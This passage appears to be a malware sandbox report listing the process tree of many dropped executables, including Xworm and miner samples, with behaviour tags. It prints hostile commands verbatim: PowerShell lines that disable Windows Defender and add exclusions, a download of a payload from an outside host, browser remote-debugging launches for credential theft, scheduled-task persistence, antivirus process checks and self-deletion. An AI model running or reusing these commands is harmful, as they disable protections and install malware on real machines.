    - Modifies system certificate store
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:4232
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\a\filer.exe
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2740
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:548
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic os get Caption
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3868
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic cpu get Name
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:5052
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:3628
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:1556
- - C:\Users\Admin\AppData\Local\Temp\a\AmLzNi.exe
    "C:\Users\Admin\AppData\Local\Temp\a\AmLzNi.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID:3692
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Invoke-WebRequest -Uri "https://ratsinthehole.com/vvvv/yVdlbFlx" -OutFile "C:\Users\Public\Guard.exe""
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1356
- - C:\Users\Admin\AppData\Local\Temp\a\Xworm%20V5.6.exe
    "C:\Users\Admin\AppData\Local\Temp\a\Xworm%20V5.6.exe"
    3⤵
    - Executes dropped EXE
    PID:2872
- - C:\Users\Admin\AppData\Local\Temp\a\XClient.exe
    "C:\Users\Admin\AppData\Local\Temp\a\XClient.exe"
    3⤵
    - Executes dropped EXE
    PID:4056
- - C:\Users\Admin\AppData\Local\Temp\a\333.exe
    "C:\Users\Admin\AppData\Local\Temp\a\333.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:676
- - C:\Users\Admin\AppData\Local\Temp\a\VBVEd6f.exe
    "C:\Users\Admin\AppData\Local\Temp\a\VBVEd6f.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    PID:2176
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
      4⤵
      Uses browser remote debugging
      Enumerates system info in registry
      Modifies data under HKEY_USERS
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of FindShellTrayWindow
      PID:3588
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffad3dacc40,0x7ffad3dacc4c,0x7ffad3dacc58
        5⤵
        
        PID:2916
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1932,i,17410357306823621499,705348385987650993,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1928 /prefetch:2
        5⤵
        
        PID:4872
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2168,i,17410357306823621499,705348385987650993,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2184 /prefetch:3
        5⤵
        
        PID:4904
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2208,i,17410357306823621499,705348385987650993,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2260 /prefetch:8
        5⤵
        
        PID:3288
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3160,i,17410357306823621499,705348385987650993,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3180 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:5132
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3188,i,17410357306823621499,705348385987650993,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3228 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:5140
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4516,i,17410357306823621499,705348385987650993,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4524 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:5296
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4932,i,17410357306823621499,705348385987650993,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5008 /prefetch:8
        5⤵
        
        PID:5888
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4732,i,17410357306823621499,705348385987650993,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5032 /prefetch:8
        5⤵
        
        PID:6068
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
      4⤵
      Uses browser remote debugging
      Enumerates system info in registry
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      PID:2568
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xdc,0xe0,0xe4,0xd8,0x108,0x7ffad3bf46f8,0x7ffad3bf4708,0x7ffad3bf4718
        5⤵
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:5152
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,14159965936338452749,5863202904504523540,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2204 /prefetch:2
        5⤵
        
        PID:6040
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2168,14159965936338452749,5863202904504523540,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 /prefetch:3
        5⤵
        
        PID:6100
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2168,14159965936338452749,5863202904504523540,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2780 /prefetch:8
        5⤵
        
        PID:5760
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2168,14159965936338452749,5863202904504523540,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:544
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2168,14159965936338452749,5863202904504523540,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3472 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:5352
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2168,14159965936338452749,5863202904504523540,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3956 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:5924
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2168,14159965936338452749,5863202904504523540,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3960 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:6108
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\a\VBVEd6f.exe" & rd /s /q "C:\ProgramData\KKJJEBFCGDAK" & exit
      4⤵
      System Location Discovery: System Language Discovery
      PID:6820
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 10
        5⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:6876
- - C:\Users\Admin\AppData\Local\Temp\a\test12.exe
    "C:\Users\Admin\AppData\Local\Temp\a\test12.exe"
    3⤵
    - Executes dropped EXE
    PID:3716
- - C:\Users\Admin\AppData\Local\Temp\a\test6.exe
    "C:\Users\Admin\AppData\Local\Temp\a\test6.exe"
    3⤵
    - Executes dropped EXE
    PID:1340
- - C:\Users\Admin\AppData\Local\Temp\a\test14.exe
    "C:\Users\Admin\AppData\Local\Temp\a\test14.exe"
    3⤵
    - Executes dropped EXE
    PID:4356
- - C:\Users\Admin\AppData\Local\Temp\a\pantest.exe
    "C:\Users\Admin\AppData\Local\Temp\a\pantest.exe"
    3⤵
    - Executes dropped EXE
    PID:3644
- - C:\Users\Admin\AppData\Local\Temp\a\test9.exe
    "C:\Users\Admin\AppData\Local\Temp\a\test9.exe"
    3⤵
    - Executes dropped EXE
    PID:1740
- - C:\Users\Admin\AppData\Local\Temp\a\test10-29.exe
    "C:\Users\Admin\AppData\Local\Temp\a\test10-29.exe"
    3⤵
    - Executes dropped EXE
    PID:5324
- - C:\Users\Admin\AppData\Local\Temp\a\test19.exe
    "C:\Users\Admin\AppData\Local\Temp\a\test19.exe"
    3⤵
    - Executes dropped EXE
    PID:5692
- - C:\Users\Admin\AppData\Local\Temp\a\test10.exe
    "C:\Users\Admin\AppData\Local\Temp\a\test10.exe"
    3⤵
    - Executes dropped EXE
    PID:5784
- - C:\Users\Admin\AppData\Local\Temp\a\test_again4.exe
    "C:\Users\Admin\AppData\Local\Temp\a\test_again4.exe"
    3⤵
    - Executes dropped EXE
    PID:6044
- - C:\Users\Admin\AppData\Local\Temp\a\test23.exe
    "C:\Users\Admin\AppData\Local\Temp\a\test23.exe"
    3⤵
    - Executes dropped EXE
    PID:5280
- - C:\Users\Admin\AppData\Local\Temp\a\test5.exe
    "C:\Users\Admin\AppData\Local\Temp\a\test5.exe"
    3⤵
    - Executes dropped EXE
    PID:5544
- - C:\Users\Admin\AppData\Local\Temp\a\test11.exe
    "C:\Users\Admin\AppData\Local\Temp\a\test11.exe"
    3⤵
    - Executes dropped EXE
    PID:5768
- - C:\Users\Admin\AppData\Local\Temp\a\test20.exe
    "C:\Users\Admin\AppData\Local\Temp\a\test20.exe"
    3⤵
    - Executes dropped EXE
    PID:6016
- - C:\Users\Admin\AppData\Local\Temp\a\test_again3.exe
    "C:\Users\Admin\AppData\Local\Temp\a\test_again3.exe"
    3⤵
    - Executes dropped EXE
    PID:5676
- - C:\Users\Admin\AppData\Local\Temp\a\test16.exe
    "C:\Users\Admin\AppData\Local\Temp\a\test16.exe"
    3⤵
    - Executes dropped EXE
    PID:3668
- - C:\Users\Admin\AppData\Local\Temp\a\test13.exe
    "C:\Users\Admin\AppData\Local\Temp\a\test13.exe"
    3⤵
    - Executes dropped EXE
    PID:3960
- - C:\Users\Admin\AppData\Local\Temp\a\test_again2.exe
    "C:\Users\Admin\AppData\Local\Temp\a\test_again2.exe"
    3⤵
    - Executes dropped EXE
    PID:1484
- - C:\Users\Admin\AppData\Local\Temp\a\test15.exe
    "C:\Users\Admin\AppData\Local\Temp\a\test15.exe"
    3⤵
    - Executes dropped EXE
    PID:6164
- - C:\Users\Admin\AppData\Local\Temp\a\test18.exe
    "C:\Users\Admin\AppData\Local\Temp\a\test18.exe"
    3⤵
    - Executes dropped EXE
    PID:6296
- - C:\Users\Admin\AppData\Local\Temp\a\test21.exe
    "C:\Users\Admin\AppData\Local\Temp\a\test21.exe"
    3⤵
    - Executes dropped EXE
    PID:6388
- - C:\Users\Admin\AppData\Local\Temp\a\test22.exe
    "C:\Users\Admin\AppData\Local\Temp\a\test22.exe"
    3⤵
    - Executes dropped EXE
    PID:6476
- - C:\Users\Admin\AppData\Local\Temp\a\test8.exe
    "C:\Users\Admin\AppData\Local\Temp\a\test8.exe"
    3⤵
    - Executes dropped EXE
    PID:6636
- - C:\Users\Admin\AppData\Local\Temp\a\test7.exe
    "C:\Users\Admin\AppData\Local\Temp\a\test7.exe"
    3⤵
    - Executes dropped EXE
    PID:6740
- - C:\Users\Admin\AppData\Local\Temp\a\test-again.exe
    "C:\Users\Admin\AppData\Local\Temp\a\test-again.exe"
    3⤵
    - Executes dropped EXE
    PID:6868
- - C:\Users\Admin\AppData\Local\Temp\a\test17.exe
    "C:\Users\Admin\AppData\Local\Temp\a\test17.exe"
    3⤵
    - Executes dropped EXE
    PID:7000
- - C:\Users\Admin\AppData\Local\Temp\a\vg9qcBa.exe
    "C:\Users\Admin\AppData\Local\Temp\a\vg9qcBa.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:7072
  - - C:\Users\Admin\AppData\Local\Temp\a\vg9qcBa.exe
      "C:\Users\Admin\AppData\Local\Temp\a\vg9qcBa.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:5296
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5296 -s 1388
        5⤵
        Program crash
        
        PID:6396
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5296 -s 1408
        5⤵
        Program crash
        
        PID:1852
- - C:\Users\Admin\AppData\Local\Temp\a\win.exe
    "C:\Users\Admin\AppData\Local\Temp\a\win.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    PID:6536
  - - C:\Windows\SysWOW64\route.exe
      route print
      4⤵
      System Location Discovery: System Language Discovery
      PID:6644
  - - C:\Windows\SysWOW64\arp.exe
      arp -a 10.127.0.1
      4⤵
      Network Service Discovery
      System Location Discovery: System Language Discovery
      PID:3604
- - C:\Users\Admin\AppData\Local\Temp\a\cbchr.exe
    "C:\Users\Admin\AppData\Local\Temp\a\cbchr.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:3368
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of SetWindowsHookEx
      PID:5640
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3368 -s 1012
      4⤵
      Program crash
      PID:5580
- - C:\Users\Admin\AppData\Local\Temp\a\FaceBuild.exe
    "C:\Users\Admin\AppData\Local\Temp\a\FaceBuild.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:2636
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      PID:6720
  - - C:\Windows\SysWOW64\Wbem\wmic.exe
      wmic os get Caption,Version
      4⤵
      System Location Discovery: System Language Discovery
      PID:6940
  - - C:\Windows\SysWOW64\Wbem\wmic.exe
      wmic os get InstallDate
      4⤵
      System Location Discovery: System Language Discovery
      PID:7036
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -command [CultureInfo]::InstalledUICulture.Name
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      PID:7148
  - - C:\Windows\SysWOW64\Wbem\wmic.exe
      wmic cpu get Name,NumberOfCores,NumberOfLogicalProcessors,Manufacturer
      4⤵
      System Location Discovery: System Language Discovery
      PID:6292
  - - C:\Windows\SysWOW64\Wbem\wmic.exe
      wmic memorychip get Capacity
      4⤵
      System Location Discovery: System Language Discovery
      PID:3516
  - - C:\Windows\SysWOW64\Wbem\wmic.exe
      wmic path win32_videocontroller get Name
      4⤵
      System Location Discovery: System Language Discovery
      Detects videocard installed
      PID:4320
  - - C:\Windows\SysWOW64\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      System Location Discovery: System Language Discovery
      PID:6624
  - - C:\Windows\SysWOW64\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      System Location Discovery: System Language Discovery
      PID:6116
- - C:\Users\Admin\AppData\Local\Temp\a\InstaIIer.exe
    "C:\Users\Admin\AppData\Local\Temp\a\InstaIIer.exe"
    3⤵
    - Executes dropped EXE
    PID:684
- - C:\Users\Admin\AppData\Local\Temp\a\TikTokDesktop18.exe
    "C:\Users\Admin\AppData\Local\Temp\a\TikTokDesktop18.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:6616
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of SetWindowsHookEx
      PID:4932
- - C:\Users\Admin\AppData\Local\Temp\a\TikTok18.exe
    "C:\Users\Admin\AppData\Local\Temp\a\TikTok18.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    PID:5700
- - C:\Users\Admin\AppData\Local\Temp\a\x4lburt.exe
    "C:\Users\Admin\AppData\Local\Temp\a\x4lburt.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    PID:6116
  - - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\computerlead.exe
      C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\computerlead.exe
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      PID:5588
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
        5⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        System Location Discovery: System Language Discovery
        
        PID:6976
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6976 -s 352
        6⤵
        Program crash
        
        PID:1196
- - C:\Users\Admin\AppData\Local\Temp\a\installer.exe
    "C:\Users\Admin\AppData\Local\Temp\a\installer.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:6724
  - - C:\Windows\SysWOW64\dxdiag.exe
      "C:\Windows\SysWOW64\dxdiag.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2808
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2808 -s 1284
        5⤵
        Program crash
        
        PID:6248
- - C:\Users\Admin\AppData\Local\Temp\a\9758xBqgE1azKnB.exe
    "C:\Users\Admin\AppData\Local\Temp\a\9758xBqgE1azKnB.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:3868
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\grjujyNaBLaKbU.exe"
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:2620
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\grjujyNaBLaKbU" /XML "C:\Users\Admin\AppData\Local\Temp\tmp651.tmp"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:5152
  - - C:\Users\Admin\AppData\Local\Temp\a\9758xBqgE1azKnB.exe
      "C:\Users\Admin\AppData\Local\Temp\a\9758xBqgE1azKnB.exe"
      4⤵
      PID:6372
- - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
    "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:7008
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:2400
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2400 -s 1384
        5⤵
        Program crash
        
        PID:6000
- - C:\Users\Admin\AppData\Local\Temp\a\0fVlNye.exe
    "C:\Users\Admin\AppData\Local\Temp\a\0fVlNye.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    PID:5260
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c copy Bukkake Bukkake.cmd && Bukkake.cmd
      4⤵
      System Location Discovery: System Language Discovery
      PID:1380
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        
        PID:3536
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "wrsa opssvc"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4192
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        
        PID:180
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5660
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 29442
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:6352
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Wendy + ..\Psychiatry + ..\Rid + ..\Games + ..\Norway + ..\Matching + ..\Jungle + ..\Elliott + ..\Jpg + ..\Americans + ..\Exhibits + ..\Peeing + ..\Typical + ..\Innocent + ..\Seafood + ..\Nervous + ..\Households + ..\Ai + ..\Hotel + ..\Holdem + ..\Drums + ..\Carlo + ..\Tm + ..\Landscape + ..\Resolutions + ..\Def + ..\Lambda + ..\Biodiversity + ..\Odds + ..\Smithsonian + ..\Blvd + ..\Actual + ..\Guy + ..\Expert + ..\Delaware + ..\Eagle + ..\Eugene + ..\Exempt + ..\Same + ..\Ebooks + ..\Individuals + ..\Sucking + ..\Chan + ..\Turns + ..\Satin + ..\Dealing + ..\Result + ..\Through + ..\Realized l
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1748
    - - C:\Users\Admin\AppData\Local\Temp\29442\Reynolds.com
        
        Reynolds.com l
        5⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        
        PID:4524
      - C:\Users\Admin\AppData\Local\Temp\29442\Reynolds.com
        
        C:\Users\Admin\AppData\Local\Temp\29442\Reynolds.com
        6⤵
        
        PID:4756
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:6192
    - - C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1764
- - C:\Users\Admin\AppData\Local\Temp\a\IMG001.exe
    "C:\Users\Admin\AppData\Local\Temp\a\IMG001.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:3288
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c taskkill /f /im tftp.exe & tskill tftp.exe
      4⤵
      System Location Discovery: System Language Discovery
      PID:6992
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im tftp.exe
        5⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        
        PID:864
  - - C:\Users\Admin\AppData\Local\Temp\tftp.exe
      "C:\Users\Admin\AppData\Local\Temp\tftp.exe"
      4⤵
      PID:5520
  - - C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe
      "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
      4⤵
      PID:1540
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c taskkill /f /im tftp.exe & tskill tftp.exe
        5⤵
        
        PID:7048
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im tftp.exe
        6⤵
        Kills process with taskkill
        
        PID:5992
- - C:\Users\Admin\AppData\Local\Temp\a\rh.exe
    "C:\Users\Admin\AppData\Local\Temp\a\rh.exe"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
